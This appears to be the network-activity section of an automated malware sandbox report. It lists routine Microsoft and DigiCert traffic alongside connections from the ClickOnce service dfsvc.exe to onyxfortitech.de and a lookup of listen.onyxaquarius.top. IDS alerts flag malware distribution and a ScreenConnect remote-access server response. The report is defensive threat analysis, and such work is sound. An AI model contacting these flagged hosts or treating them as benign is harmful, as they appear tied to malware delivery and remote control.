6544 | svchost.exe | GET | 200 | 23.40.158.218:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
5176 | dfsvc.exe | GET | 200 | 23.40.158.218:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | whitelisted
7920 | SIHClient.exe | GET | 200 | 23.32.97.216:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7920 | SIHClient.exe | GET | 200 | 23.32.97.216:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation

2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 23.48.23.188:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5176 | dfsvc.exe | 104.21.85.50:443 | onyxfortitech.de | CLOUDFLARENET | - | unknown
6544 | svchost.exe | 40.126.32.134:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 23.40.158.218:80 | ocsp.digicert.com | AKAMAI-AS | MX | whitelisted
3216 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5176 | dfsvc.exe | 23.40.158.218:80 | ocsp.digicert.com | AKAMAI-AS | MX | whitelisted
2112 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain (reputation): resolved IPs

settings-win.data.microsoft.com (whitelisted):
  • 51.124.78.146
google.com (whitelisted):
  • 142.250.185.110
crl.microsoft.com (whitelisted):
  • 23.48.23.188
  • 23.48.23.162
  • 23.48.23.190
  • 23.48.23.181
  • 23.48.23.191
  • 23.48.23.166
  • 23.48.23.176
  • 23.48.23.173
  • 23.48.23.164
onyxfortitech.de (unknown):
  • 104.21.85.50
  • 172.67.202.119
login.live.com (whitelisted):
  • 40.126.32.134
  • 20.190.160.20
  • 20.190.160.131
  • 20.190.160.130
  • 20.190.160.2
  • 20.190.160.132
  • 20.190.160.14
  • 20.190.160.3
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.66
  • 20.190.160.65
ocsp.digicert.com (whitelisted):
  • 23.40.158.218
client.wns.windows.com (whitelisted):
  • 40.113.110.67
arc.msn.com (whitelisted):
  • 20.223.36.55
listen.onyxaquarius.top (unknown):
  • 194.102.105.26
slscr.update.microsoft.com (whitelisted):
  • 20.109.210.53

Threats

Class: A Network Trojan was detected
Message: MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (onyxaquarius .top)

Class: Potentially Bad Traffic
Message: ET DNS Query to a *.top domain - Likely Hostile

Class: Potential Corporate Privacy Violation
Message: REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info